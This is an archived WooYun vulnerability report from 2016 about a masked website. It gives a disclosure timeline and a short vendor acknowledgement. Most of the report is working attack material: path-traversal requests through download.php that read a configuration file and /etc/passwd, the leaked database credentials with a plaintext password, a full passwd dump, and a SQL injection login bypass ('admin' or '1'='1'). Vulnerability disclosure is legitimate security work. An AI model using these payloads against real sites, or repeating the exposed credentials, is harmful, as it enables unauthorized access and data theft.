乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-12: 厂商已经确认,细节仅向厂商公开 2016-01-22: 细节向核心白帽子及相关领域专家公开 2016-02-01: 细节向普通白帽子公开 2016-02-11: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
rt
目标:http://**.**.**.**1.任意文件下载构造,
http://**.**.**.**/cn/download.php?f=/cn/index.php
配置信息
http://**.**.**.**/cn/download.php?f=/cn/info.php
info.php中
$DEF_dbServer = "**.**.**.**"; $DEF_dbName = "flyingco"; $DEF_dbUser = "flyingco"; $DEF_dbPswd = "anan6av9";
passwd下载
http://**.**.**.**/cn/download.php?f=/../../../etc/passwd
passwd中
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/bin/bashdaemon:x:2:2:Daemon:/sbin:/bin/bashlp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bashmail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/falsenews:x:9:13:News system:/etc/news:/bin/bashuucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bashgames:x:12:100:Games account:/var/games:/bin/bashman:x:13:62:Manual pages viewer:/var/cache/man:/bin/bashwwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/falseftp:x:40:49:FTP account:/srv/ftp:/bin/bashnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bashmessagebus:*:100:101:User for D-Bus:/var/run/dbus:/bin/falsesshd:*:101:102:SSH daemon:/var/lib/sshd:/bin/falseusbmux:x:102:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologinntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/falsestatd:x:103:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologinnullmail:x:104:105::/var/lock/svc/nullmailer:/bin/truemysql:x:60:106:MySQL database admin:/var/lib/mysql:/bin/falsepostfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/falsepolkitd:x:499:498:User for polkitd:/var/lib/polkit:/sbin/nologin+::::::
2.注入用admin'登录,报错
构造
admin' or '1'='1
进入后台
..
危害等级:高
漏洞Rank:17
确认时间:2016-01-12 02:14
感謝通報
暂无